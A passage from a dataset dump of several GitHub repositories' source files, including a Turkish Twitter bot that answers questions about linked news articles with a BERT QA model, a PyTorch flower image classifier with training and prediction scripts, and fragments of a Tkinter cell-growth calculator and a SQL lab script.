Roman\", 15))\n champs1.pack()\n var_texte = StringVar()\n ligne_texte = Entry(fields, textvariable=var_texte)\n ligne_texte.pack()\n\n champs2 = Label(fields,text=\"Number of days ? (n)\")\n champs2.config(font=(\"Times New Roman\", 15))\n champs2.pack()\n\n var_texte2 = StringVar()\n ligne_texte2 = Entry(fields, textvariable=var_texte2)\n ligne_texte2.pack()\n\n champs3 = Label(fields,text=\"Number of division every 24 hour ? 
(q)\")\n champs3.config(font=(\"Times New Roman\", 15))\n champs3.pack()\n var_texte3 = StringVar()\n ligne_texte3 = Entry(fields, textvariable=var_texte3)\n ligne_texte3.pack()\n\n champs4 = Label(fields,text=\"Number of cells at day n ? (Un)\")\n champs4.config(font=(\"Times New Roman\", 15))\n champs4.pack()\n var_texte4 = StringVar()\n ligne_texte4 = Entry(fields, textvariable=var_texte4)\n ligne_texte4.pack()\n\n bouton_calculer = Button(fields, text=\"Compute\", command=lambda: calculer(var_texte, var_texte2,var_texte3,var_texte4,fields))\n bouton_calculer.pack()\n\n # champs5 = Label(fields,text=f\"\\nRésultat : ? \")\n # champs5.config(font=(\"Times New Roman\", 15))\n # champs5.pack()\n\n fields.pack()\n\n #### Illustration of equations\n\n\n\n fenetre.mainloop()\n\nif __name__ == '__main__':\n PTGC_GUI()\n" } ]
5
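The PTGC record models geometric growth: calculations.py works with Un = U0 * q**n, while the GUI expresses the same growth as Un = U0 * 2**(n*q), where q is the number of divisions per day (the two bases differ by a factor of log2). A quick self-contained round-trip check of the generic form, with made-up numbers for illustration:

import math

U0, q, n = 100.0, 2.0, 5
Un = U0 * q ** n                                        # forward model: 3200.0
assert abs((Un / U0) ** (1.0 / n) - q) < 1e-9           # recover q
assert abs(math.log(Un / U0) / math.log(q) - n) < 1e-9  # recover n
assert abs(Un / q ** n - U0) < 1e-9                     # recover U0
print("round-trip OK:", Un)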
r0sky/Yani
https://github.com/r0sky/Yani
b5be095b561c5b61a3739e40ee30caa2ae581d12
e1b90a5883ffe99515abb248a550a6920bb8b197
a2804b539d409d2f4f1873819b378773541dc283
refs/heads/main
2023-09-01T15:13:56.555186
2021-10-09T20:56:32
2021-10-09T20:56:32
415,410,636
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.582402229309082, "alphanum_fraction": 0.5879888534545898, "avg_line_length": 22.866666793823242, "blob_id": "4e7701e53f482a92775c015c6d67f39b2d5aef8a", "content_id": "930161b9298aa8b9b508c765b6c2a373b8aa423f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "permissive", "max_line_length": 53, "num_lines": 30, "path": "/reply.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import tweepy\nimport time\nfrom tweepy_client import twitter_api\nimport bot_functions\nimport qa_model\n\n\ndef execute_bot() -> None:\n    \"\"\"\n    main method to prepare model and run the bot\n    \"\"\"\n    print(\"Yani? started..\")\n    api = twitter_api()\n    print(\"Tweepy Authentication is successful.\")\n    nlp = qa_model.get_bert_qa_model()\n    print(\"Bert QA Model preparation is successful.\")\n    while True:\n        try:\n            bot_functions.bot_run(api=api, model=nlp)\n            time.sleep(20)\n        except tweepy.TweepError as e:\n            print(e)\n            print('sleeping...')\n            time.sleep(60)\n        except StopIteration:\n            break\n\n\nif __name__ == '__main__':\n    execute_bot()\n" }, { "alpha_fraction": 0.6511375904083252, "alphanum_fraction": 0.6514987349510193, "avg_line_length": 34.05063247680664, "blob_id": "e0c052038959cdd420b36de865a9a150003517a2", "content_id": "744d07cffc70c6b6a565306865...", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2769, "license_type": "permissive", "max_line_length": 127, "num_lines": 79, "path": "/bot_functions.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import transformers\nimport tweepy\nimport helper_functions as helper\nimport article\nimport qa_model\n\nFILE_NAME = 'last_seen.txt'\n\n\ndef get_news_url(tweet):\n    \"\"\"\n    searches and returns the link in the tweet\n    Args:\n        tweet: tweet as tweepy object\n    Returns:\n        url if exists\n    \"\"\"\n    print(\"Searching for URL in the tweet..\")\n    try:\n        return tweet.entities.get('urls')[0].get('expanded_url')\n    except:\n        print(\"Url is missing..\")\n        print(\"Tweet: {}\".format(tweet))\n        return None\n\n\ndef reply_tweet(root_tweet, original_mention, api, model):\n    \"\"\"\n    method that contains all functions to reply and favourite the mention considered as a question\n    Args:\n        root_tweet: mentioned root tweet object\n        original_mention: mention that triggers Yani\n        api: authenticated tweepy api object\n        model: pre-trained turkish qa model pipeline\n    Returns:\n        none\n    \"\"\"\n    print(\"Replying Tweet.\")\n    print(\"Original Mention:\", original_mention)\n    print(\"Original Mention Text:\", original_mention.full_text)\n    question = helper.get_clean_tweet(original_mention.full_text)\n    print(question)\n    news_link = get_news_url(tweet=root_tweet)\n    print(\"news link: {}\".format(news_link))\n    news_link = helper.track_url(org_url=news_link)\n    print(\"Redirected URL: {}\".format(news_link))\n    article_content = article.get_news_text(news_url=news_link)\n    if article_content == \"\":\n        print(\"Couldn't get news content!\")\n    else:\n        answer = qa_model.get_answer(news_context=article_content, user_question=question, model=model)\n        status = '@' + root_tweet.user.screen_name + \" @\" + original_mention.user.screen_name + \" \" + str(answer.get(\"answer\"))\n        try:\n            api.create_favorite(original_mention.id)\n        except:\n            pass\n        print(\"Tweet is favorited.\")\n        api.update_status(status, in_reply_to_status_id=original_mention.id)\n        helper.store_last_seen(FILE_NAME, original_mention.id)\n        
print(status)\n    print(\"Replied!\")\n\n\ndef bot_run(api: tweepy.API, model: transformers.pipeline) -> None:\n    \"\"\"\n    gets non-replied&mentioned tweets and replies\n    Args:\n        api: authenticated tweepy api object\n        model: pre-trained turkish qa model pipeline\n    Returns:\n        None\n    \"\"\"\n    print(\"Yani? is running..\")\n    # gets mentioned tweets which are not already replied\n    tweets = api.mentions_timeline(since_id=helper.read_last_seen(FILE_NAME), tweet_mode='extended')\n    for tweet in reversed(tweets):\n        if helper.is_not_reply(tweet):\n            root_tweet = helper.get_tweet_root(tweet_id=tweet.id, api=api)\n            reply_tweet(root_tweet=root_tweet, original_mention=tweet, api=api, model=model)\n" }, { "alpha_fraction": 0.6047173738479614, "alphanum_fraction": 0.6091907024383545, "avg_line_length": 27.264368057250977, "blob_id": "48412ff397c5c524e5d0f9b2590879fc3e4187b5", "content_id": "5551bc6b57d58f19f800a3b4c583efff203ba2bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2459, "license_type": "permissive", "max_line_length": 95, "num_lines": 87, "path": "/helper_functions.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "import re\nimport tweepy\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef read_last_seen(FILE_NAME: str) -> int:\n    \"\"\"\n    gets the id of last seen tweet\n    Args:\n        FILE_NAME: static file name which stores the last seen id\n    Returns:\n        last_seen_id: id of the tweet\n    \"\"\"\n    file_read = open(FILE_NAME, 'r')\n    readed = file_read.read()\n    file_read.close()\n    print(\"Last Seen ID is read.\")\n    if readed != \"\":\n        return int(readed.strip())\n    return 0\n\n\ndef store_last_seen(FILE_NAME: str, last_seen_id: int) -> None:\n    \"\"\"\n    saves the id of a last seen tweet in the txt\n    Args:\n        FILE_NAME: static file name which stores the last seen id\n        last_seen_id: id of the tweet\n    \"\"\"\n    file_write = open(FILE_NAME, 'w')\n    file_write.write(str(last_seen_id))\n    file_write.close()\n    print(\"Last Seen ID is stored.\")\n    return\n\n\ndef is_not_reply(tweet):\n    \"\"\"\n    treats mentions with many @handles as reply chains, not direct questions\n    \"\"\"\n    count = tweet.full_text.count('@')\n    return count < 5\n\n\ndef get_tweet_root(tweet_id: int, api: tweepy.API):\n    \"\"\"\n    gets the origin tweet which is mentioned\n    Args:\n        tweet_id: id of the mention\n        api: authenticated tweepy api object\n    Returns:\n        mentioned root tweet object\n    \"\"\"\n    print(\"Getting Tweet Root..\")\n    while api.get_status(tweet_id).in_reply_to_status_id is not None:\n        tweet_id = api.get_status(tweet_id).in_reply_to_status_id\n    return api.get_status(tweet_id, tweet_mode=\"extended\")\n\n\ndef get_clean_tweet(tweet: str) -> str:\n    \"\"\"\n    cleans text of urls and words beginning with @ or #\n    Args:\n        tweet: text version of tweet\n    Returns:\n        cleaned text\n    \"\"\"\n    return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(#[A-Za-z0-9])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\ndef track_url(org_url: str) -> str:\n    \"\"\"\n    tracks the url and where it leads to and returns the final redirected url\n    Args:\n        org_url: link in the root tweet\n    Returns:\n        redirected url\n    \"\"\"\n    print(\"Tracking URL..\")\n    url = \"https://wheregoes.com/trace/\"\n    data = {'url': org_url, 'ua': 'Wheregoes.com Redirect Checker/1.0'}\n    post_data = requests.post(url, data=data).text\n    soup = BeautifulSoup(post_data, 'lxml')\n    url_list = soup.find_all('div', class_=\"cell url\")\n    redirected_url = url_list[-1].contents[1]['href']\n    print(\"Returning redirected URL..\")\n    return redirected_url if redirected_url != 
\"\"\n" }, { "alpha_fraction": 0.6606851816177368, "alphanum_fraction": 0.6606851816177368, "avg_line_length": 26.863636016845703, "blob_id": "8ce1d2cb2ae06abd31ccce068cf5fd6546cd7b06", "content_id": "0caf3356077ea1aad372df7db2d3a6fdddec369c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "permissive", "max_line_length": 83, "num_lines": 22, "path": "/tweepy_client.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from os import environ\nimport tweepy\n\n\ndef twitter_api() -> tweepy.API:\n \"\"\"\n authenticates twitter API\n Args:\n none\n Returns:\n authenticated tweepy api object\n \"\"\"\n print(\"Tweepy Authentication Started..\")\n # key and secrets could be kept in an environment\n consumer_key = \"\"\n consumer_secret = \"\"\n access_token = \"\"\n access_token_secret = \"\"\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n return api\n" }, { "alpha_fraction": 0.6923592686653137, "alphanum_fraction": 0.6923592686653137, "avg_line_length": 38.26315689086914, "blob_id": "d27a9449e064e20ec9d9a43af026fda3d20a3c96", "content_id": "d53372b7cff578a1f9795b4c91b5ba8167fe7dd4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "permissive", "max_line_length": 99, "num_lines": 38, "path": "/qa_model.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from transformers import AutoTokenizer, AutoModelForQuestionAnswering, pipeline\nimport torch\n\n\ndef get_bert_qa_model() -> pipeline:\n \"\"\"\n gets pre-trained turkish qa model by savas yildirim from huggingface via transformers\n Args:\n none\n Returns:\n pre-trained transformers turkish qa model\n \"\"\"\n print(\"Preparing Bert Question Answering Model..\")\n tokenizer = AutoTokenizer.from_pretrained(\"savasy/bert-base-turkish-squad\")\n model = AutoModelForQuestionAnswering.from_pretrained(\"savasy/bert-base-turkish-squad\")\n nlp = pipeline(\"question-answering\", model=model, tokenizer=tokenizer)\n return nlp\n\n\ndef get_answer(news_context: str, user_question: str, model: pipeline):\n \"\"\"\n qa model finds answer in the page content\n Args:\n news_context: content of the page\n user_question: text of the mention accepted as question\n model: pre-trained turkish qa model pipeline\n Returns:\n answer that qa model finds which contains text as an answer and the confidence rate\n \"\"\"\n print(\"Getting Answer..\")\n print(\"news context: {}\\nquestion: {}\\nmodel: {}\".format(news_context, user_question, model))\n if news_context is None:\n print(\"Couldn't get the context. Please check the printed tweet ID. 
URL might be missing.\")\n    else:\n        print(\"Model Started to get answer..\")\n        answer = model(question=user_question, context=news_context)\n        print(\"Model Returns the answer..\")\n        return answer\n" }, { "alpha_fraction": 0.8006042242050171, "alphanum_fraction": 0.8046324253082275, "avg_line_length": 98.30000305175781, "blob_id": "6426e94965e7ec7125aebd355bf1dad205b6cc27", "content_id": "7c71405f1f29fea2b400dc72413706a6d81d07eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 993, "license_type": "permissive", "max_line_length": 220, "num_lines": 10, "path": "/README.md", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "# Yani\nA twitter bot that reads the content of a shared link and answers your question.\n\nNews and content sites in particular post Twitter links that arouse curiosity and waste our time, instead of sharing the short piece of information that would fit in 280 characters.\nSome popular Twitter pages were created to counter this annoying clickbait and waste of time. Two of them are @bosunatiklama and @LimonHaber.\nHowever, these accounts cannot respond to the content of every news page, so they cannot meet the demands of dozens of followers, because the account holders need to read and write content or retweet other volunteers' posts.\nThe aim here is to automate this work so that any user can get the answer to their question by tagging the bot.\nThe bot answers the question by mentioning it publicly, so anyone wondering about a similar question can see the answer under the original tweet.\n\n![example bot usage](https://github.com/r0sky/Yani/blob/main/bot_ss.png?raw=true)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.700000762939453, "blob_id": "28b7ea7be29e9bdaa5fdf7119e5446d23b6c3c4d", "content_id": "80dac9add1f52214689af1fbdff3b7d0d218a4c5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "permissive", "max_line_length": 41, "num_lines": 20, "path": "/article.py", "repo_name": "r0sky/Yani", "src_encoding": "UTF-8", "text": "from newspaper import Article\n\n\ndef get_news_text(news_url: str):\n    \"\"\"\n    scrapes website and returns the content\n    Args:\n        news_url: url to be scraped\n    Returns:\n        content in the related page\n    \"\"\"\n    print(\"Getting Article Content..\")\n    if news_url is None:\n        print(\"URL is missing\")\n        return None\n    else:\n        article = Article(news_url)\n        article.download()\n        article.parse()\n        return article.text\n" } ]
7
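Yani's qa_model.py wraps a standard Hugging Face extractive-QA pipeline around the public savasy/bert-base-turkish-squad model. A minimal sketch of that call in isolation; running it downloads the model, and the Turkish question/context pair and the printed answer are illustrative only, not taken from the repo:

from transformers import pipeline

# question: "Who came home?"; context: "Ali came home yesterday evening and fell asleep right away."
nlp = pipeline("question-answering", model="savasy/bert-base-turkish-squad")
result = nlp(
    question="Eve kim geldi?",
    context="Dun aksam Ali eve geldi ve hemen uyudu.",
)
# result is a dict such as {'score': ..., 'start': ..., 'end': ..., 'answer': 'Ali'}
print(result["answer"], result["score"])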
tom91i/Udacity-AI-Image-Classifier-
https://github.com/tom91i/Udacity-AI-Image-Classifier-
ee4e4af94f7a063fe87b39fbdf291bf555f31911
75d35367101d62b2ff0c48a109e7c48b3cc59071
ae6021b5a7d2ea965e546b8abb7e8127f9012dcf
refs/heads/master
2021-01-26T04:03:18.268668
2020-02-27T00:16:27
2020-02-27T00:16:27
243,301,561
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6174072623252869, "alphanum_fraction": 0.6430900692939758, "avg_line_length": 28.37724494934082, "blob_id": "ae41c8f3084de5b38eed8f3d79d52618e7a75208", "content_id": "102dd52d69f3d45acb057454890a133aa142c466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4910, "license_type": "no_license", "max_line_length": 140, "num_lines": 167, "path": "/predict.py", "repo_name": "tom91i/Udacity-AI-Image-Classifier-", "src_encoding": "UTF-8", "text": "# Image Classifier Part-2: Prediction\n#PROGRAMMER: Thomas Innerebner\n#Date created:29.01.2020\n#Date revised:26.02.2020\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom numba import cuda\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom PIL import Image\nimport json\nimport time\n\nimport argparse\n\n#TO DO: Parser arguments\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--image_input\", default=\"/home/workspace/ImageClassifier/flowers/test/1/image_06743.jpg\", help=\"path to input image\")\nparser.add_argument(\"--gpu\", default=\"gpu\", help=\"run on GPU\", action=\"store\")\nparser.add_argument(\"--checkpoint\", default= \"/home/workspace/ImageClassifier/checkpoint.pth\", help=\"Path to trained model\")\nparser.add_argument(\"--top_k\", default=3, type=int, help=\"top categories\")\nparser.add_argument(\"--category_names\", default= \"/home/workspace/ImageClassifier/cat_to_name.json\")\nargs = parser.parse_args()\n\n# DONE: GPU \n\nif args.gpu == \"gpu\":\n    power = \"cuda\"\nelse:\n    power = \"cpu\"\n\n# DONE: Parser\n\nimage_input = args.image_input\ncheckpoint = args.checkpoint\ntop_k = args.top_k\ncategory_names = args.category_names\n\n\n#Done: Print settings:\n\nprint(power) \nprint(image_input)\nprint(checkpoint)\nprint(top_k)\nprint(category_names)\n\n# DONE: Define model structure\n\nstructures = {\"vgg16\":25088,\n              \"densenet121\" : 1024,\n              \"alexnet\" : 9216 } \n    \n# DONE: Input sizes and model selection (VGG13 changes)\n    \ndef nn_setup(structure='vgg16',dropout = 0.4, hidden_units = 4096, learning_rate = 0.001):\n    \n    if structure == 'vgg16':\n        model = models.vgg16(pretrained=True)        \n    elif structure == 'densenet121':\n        model = models.densenet121(pretrained=True)\n    elif structure == 'alexnet':\n        model = models.alexnet(pretrained = True)\n    else:\n        print(\"{} is not a valid model\".format(structure))\n    \n    # Freeze the pretrained parameters \n    \n    for param in model.parameters():\n        param.requires_grad = False\n\n    # Define the classifier\n    \n    from collections import OrderedDict\n    classifier = nn.Sequential(OrderedDict([\n        ('dropout',nn.Dropout(dropout)),\n        ('inputs', nn.Linear(structures[structure], hidden_units)),\n        ('relu1', nn.ReLU()),\n        ('hidden_layer1', nn.Linear(hidden_units, 1000)),\n        ('relu2',nn.ReLU()),\n        ('hidden_layer2',nn.Linear(1000,103)),\n        ('output', nn.LogSoftmax(dim=1))\n    ]))\n    \n    model.classifier = classifier\n    criterion = nn.NLLLoss()\n    optimizer = optim.Adam(model.classifier.parameters(), learning_rate )\n    \n    return model , optimizer ,criterion \n\n# Load model (Dropout rate changes)\ndef load_model(path = \"/home/workspace/ImageClassifier/checkpoint.pth\"):\n    checkpoint = torch.load(path)\n    structure = checkpoint['structure']\n    hidden_units = checkpoint['hidden_units']\n    model,_,_= nn_setup(structure, 0.4, hidden_units)\n    model.class_to_idx = checkpoint['class_to_idx']\n    
model.load_state_dict(checkpoint['state_dict'])\n    return model\n\nload_model(\"/home/workspace/ImageClassifier/checkpoint.pth\")\n\nprint(\"model successfully loaded\")\n\n#DONE: Load cat names\n\nwith open(category_names, 'r') as f:\n    cat_to_name = json.load(f)\n\n#DONE : Process image:\n\ndef process_image(image):\n    \n    pil_image = Image.open(image)\n    im_resized = pil_image.resize((224,224))\n    \n    np_image = np.array(im_resized)\n    np_image = np_image/255\n    \n    mean = np.array([0.485, 0.456, 0.406])\n    std = np.array([0.229, 0.224, 0.225])\n    np_image = (np_image - mean)/std\n    np_image = np_image.transpose(2, 0, 1)\n    return np_image\n\n#process_image(image_input)\n\n#TO DO: Predict image:\n\ndef predict(image_input, model, top_k=3, power=\"cuda\"):    \n    model.to(power)\n    img_pip = process_image(image_input)\n    img_tensor = torch.from_numpy(img_pip)\n    img_tensor = img_tensor.unsqueeze_(0)\n    img_tensor = img_tensor.float()\n    with torch.no_grad():\n        output = model.forward(img_tensor.to(power))\n        \n    probability = F.softmax(output.data,dim=1)\n    \n    return probability.topk(top_k)\n\n# TO DO: Load Model checkpoint\n\nmodel = load_model(checkpoint)\n\nimage_filename = image_input.split('/')[-2]\nname = cat_to_name[image_filename]\n\nprobs, classes = predict (image_input, model, top_k, power)\nprobs = probs.data.cpu().numpy().squeeze()\nclasses = classes.data.cpu().numpy().squeeze()+1\n\n\nprint(probs)\nprint(name)\n\n# present result\nprint(\"v--------------result------------------v\")\nfor i in range(0, len(classes)):\n    print(\"class: {}; with a probability of: {}\".format(cat_to_name[str(classes[i])], probs[i]))\nprint(\"Λ--------------result------------------Λ\")\n" }, { "alpha_fraction": 0.5244618654251099, "alphanum_fraction": 0.5502474904060364, "avg_line_length": 32.48262405395508, "blob_id": "4f266a2e1f38a47b8fdf4477d1f04b8ae58fb5fe", "content_id": "7bfd7e5a174c2696e1a05096fe4b7b3a2f33a1ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8689, "license_type": "no_license", "max_line_length": 117, "num_lines": 259, "path": "/train.py", "repo_name": "tom91i/Udacity-AI-Image-Classifier-", "src_encoding": "UTF-8", "text": "# Image Classifier Part-2: Training a CNN Model\n#PROGRAMMER: Thomas Innerebner\n#Date created:29.01.2020\n#Date revised:26.02.2020\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom numba import cuda\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom PIL import Image\nimport json\nimport time\n\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--data_dir\", default=\"/home/workspace/ImageClassifier/flowers\", help=\"path to training data\")\nparser.add_argument(\"--gpu\", default=\"gpu\", help=\"trains on GPU\", action=\"store\")\nparser.add_argument(\"--structure\", default= \"vgg16\", help=\"structure\")\nparser.add_argument(\"--learning_rate\", default=0.001, type=float, help=\"learning rate\")\nparser.add_argument(\"--dropout\", default=0.4, type=float)\nparser.add_argument(\"--epochs\", default=3, type= int, help=\"Number of Epochs\")\nparser.add_argument(\"--hidden_units\", default=4096, type =int, help=\"Hidden units\")\nparser.add_argument(\"--save_dir\", default=\"/home/workspace/ImageClassifier/checkpoint.pth\", help=\"path and filename\")\nargs = parser.parse_args()\n \n# DONE: GPU \n\nif args.gpu == \"gpu\":\n    power = \"cuda\"\nelse:\n    power = \"cpu\"\n\n # DONE: Parser\n \ndata_dir = 
args.data_dir\nlearning_rate = args.learning_rate\nhidden_units = args.hidden_units\ndropout = args.dropout\nepochs = args.epochs\nstructure = args.structure\nsave_dir =args.save_dir\n\n#DONE: Print settings\n\nprint(power) \nprint(structure)\nprint(learning_rate)\nprint(dropout)\nprint(hidden_units)\nprint(epochs)\nprint(save_dir)\n\n 
\nprint(\"Training Input from:\", data_dir)\n\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n \n# DONE: Define your transforms for the training, validation, and testing sets\n\ntrain_transforms = transforms.Compose([transforms.RandomRotation(30),\n                                      transforms.RandomCrop (224),\n                                      transforms.RandomHorizontalFlip(),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize([0.485, 0.456, 0.406],\n                                                           [0.229, 0.224, 0.225])])\n \nvalidate_transforms = transforms.Compose([transforms.Resize(256),\n                                      transforms.CenterCrop(224),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize([0.485, 0.456, 0.406],\n                                                           [0.229, 0.224, 0.225])])\n\ntest_transforms = transforms.Compose([transforms.Resize(256),\n                                      transforms.CenterCrop(224),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize([0.485, 0.456, 0.406],\n                                                           [0.229, 0.224, 0.225])])\n\n# DONE: Load the datasets with ImageFolder\n\n\ntrain_data = datasets.ImageFolder(train_dir, transform = train_transforms)\nvalidate_data = datasets.ImageFolder(valid_dir, transform = validate_transforms)\ntest_data = datasets.ImageFolder(test_dir, transform = test_transforms)\n\n# DONE: Using the image datasets and the transforms, define the dataloaders\ntrainloader = torch.utils.data.DataLoader(train_data, batch_size = 64, shuffle = True)\nvalidloader = torch.utils.data.DataLoader(validate_data, batch_size = 64, shuffle = True)\ntestloader = torch.utils.data.DataLoader(test_data, batch_size = 64)\n\nclasses = train_data.classes\n\nprint ('n batches in trainloader:',len(trainloader))\nprint ('n of pics:', len(trainloader.dataset)) \n \n# DONE: Define model structure\n\nstructures = {\"vgg16\":25088,\n              \"densenet121\" : 1024,\n              \"alexnet\" : 9216 } \n    \n# DONE: Input sizes and model selection\n    \ndef nn_setup(structure='vgg16',dropout = 0.4, hidden_units = 4096, learning_rate = 0.001):\n    \n    \n    if structure == 'vgg16':\n        model = models.vgg16(pretrained=True)        \n    elif structure == 'densenet121':\n        model = models.densenet121(pretrained=True)\n    elif structure == 'alexnet':\n        model = models.alexnet(pretrained = True)\n    else:\n        print(\"{} is not a valid model\".format(structure))\n    \n    # Freeze the pretrained parameters    \n    \n    for param in model.parameters():\n        param.requires_grad = False\n\n    # Define the classifier\n    \n    from collections import OrderedDict\n    classifier = nn.Sequential(OrderedDict([\n        ('dropout',nn.Dropout(dropout)),\n        ('inputs', nn.Linear(structures[structure], hidden_units)),\n        ('relu1', nn.ReLU()),\n        ('hidden_layer1', nn.Linear(hidden_units, 1000)),\n        ('relu2',nn.ReLU()),\n        ('hidden_layer2',nn.Linear(1000,103)),\n        ('output', nn.LogSoftmax(dim=1))\n    ]))\n    \n    model.classifier = classifier\n    criterion = nn.NLLLoss()\n    optimizer = optim.Adam(model.classifier.parameters(), learning_rate)\n    \n    \n    return model , optimizer ,criterion \n\n    \nmodel,optimizer,criterion = nn_setup(structure, dropout, hidden_units, learning_rate)\n\n#DONE: Training of CNN with Training Data\n    \ndef train_network(epochs = 8, print_every = 12, power = \"cuda\"):\n    \n    steps = 0\n    loss_show=[]\n\n\n    #DONE : train network model\n\n    # Move the model to the device\n    model.to(power)\n\n    print(\"Starting training with number of epochs:\", epochs)\n    # validate\n\n    for 
epoch in range(epochs):\n        running_loss = 0\n        for ii, (inputs, labels) in enumerate(trainloader):\n            steps += 1\n\n            inputs,labels = inputs.to(power), labels.to(power)\n\n            optimizer.zero_grad()\n\n\n            outputs = model.forward(inputs)\n            loss = criterion(outputs, labels)\n            loss.backward()\n            optimizer.step()\n\n            running_loss += loss.item()\n\n            if steps % print_every == 0:\n                model.eval()\n                vloss = 0\n                accuracy=0\n\n\n                for ii, (inputs2,labels2) in enumerate(validloader):\n                    optimizer.zero_grad()\n\n                    inputs2, labels2 = inputs2.to(power) , labels2.to(power)\n                    model.to(power)\n                    with torch.no_grad(): \n                        outputs = model.forward(inputs2)\n                        vloss += criterion(outputs,labels2).item()\n                        ps = torch.exp(outputs).data\n                        equality = (labels2.data == ps.max(1)[1])\n                        accuracy += equality.type_as(torch.FloatTensor()).mean()\n\n\n                vloss = vloss / len(validloader)\n                accuracy = accuracy*100/len(validloader)\n\n                print('Epoch: {}/{}...'.format(epoch+1, epochs),\n                      'Loss: {:.3f}...'.format(running_loss/print_every),\n                      'Validation loss: {:.3f}...'.format(vloss),\n                      'Validation accuracy: {:.3f}..'.format(accuracy))\n\n\n                running_loss = 0\n                model.train()\n\n\n    \n    print(\"-------------finished training--------------\")\n    \n    \ntrain_network(epochs,12,power) \n\n# DONE: Validation on the test set\n\ndef validation(testloader, power = \"cuda\"): \n    \n    print(\"Start validation\") \n    \n    correct = 0\n    total = 0\n    \n    model.to(power)\n    \n    with torch.no_grad():\n        for data in testloader:\n            images, labels = data\n            images, labels = images.to(power), labels.to(power)\n            outputs = model(images)\n            _, predicted = torch.max(outputs.data, 1)\n            total += labels.size(0)\n            correct += (predicted == labels).sum().item()\n    \n    print(\"-------------finished validating--------------\")\n    print('Test Accuracy: %d %%' % (100 * correct / total))\n    \nvalidation(testloader, power) \n\n# DONE: save model \n\nmodel.class_to_idx = train_data.class_to_idx\nmodel.cpu()\n\ntorch.save({'structure': structure,\n            'hidden_units': hidden_units,\n            'epochs': epochs,\n            'classifier' : model.classifier,\n            'optimizer': optimizer.state_dict(),\n            'state_dict': model.state_dict(),\n            'class_to_idx': model.class_to_idx},\n            save_dir)\n\nprint(\"model is saved to:\", save_dir)\n\n " } ]
2
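The `classes ... squeeze()+1` line in predict.py above only recovers the right folder names when the dataset folders happen to be numbered in index order plus one. A more robust sketch inverts the `class_to_idx` mapping that train.py stores on the model; `idx_to_class` and `labels` are illustrative names, not part of the original scripts:

```python
# Sketch: recover labels from the saved class_to_idx mapping instead of
# assuming that raw top-k index + 1 equals the class folder name.
probs, indices = predict(image_input, model, top_k, power)
idx_to_class = {idx: cls for cls, idx in model.class_to_idx.items()}
labels = [cat_to_name[idx_to_class[int(i)]] for i in indices.cpu().numpy().squeeze()]
```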
martinmac100/wk4_d2_SQL_Lab
https://github.com/martinmac100/wk4_d2_SQL_Lab
e68e0038c5f060bbd61a7e5c440422dab6c60035
36f3bd6588e64215e707dce863359896066a2ea9
daa71500d285bed8a37146ae60b5f049ef5d7294
refs/heads/master
2022-12-18T09:10:08.364045
2020-09-29T15:52:08
2020-09-29T15:52:08
299,665,727
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7915493249893188, "alphanum_fraction": 0.800000011920929, "avg_line_length": 21.25, "blob_id": "0670ba3ff4c737e6cd241278d9182f3a9f2761a8", "content_id": "d8e4f890942184e7d45d590659b8ad8a51c44af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/console.py", "repo_name": "martinmac100/wk4_d2_SQL_Lab", "src_encoding": "UTF-8", "text": "import pdb\nfrom models.album import Album\nfrom models.artist import Artist\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\n# album_repository.delete_all()\n# artist_repository.delete_all()\n\nartist1 = Artist(\"Jarvis\", \"Cocker\")\nartist_repository.save(artist1)\n\n# artist2\n\n\npdb.set_trace()" } ]
1
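console.py above drives a repository layer (`artist_repository.save` and friends) that is not part of this record. For orientation, a minimal sketch of the save half of that pattern, assuming a `run_sql` helper that executes parameterised SQL and returns rows as dictionaries; the helper, table, and column names are all assumptions, not the lab's actual code:

```python
# Hypothetical repositories/artist_repository.py, for illustration only.
from db.run_sql import run_sql  # assumed helper module

def save(artist):
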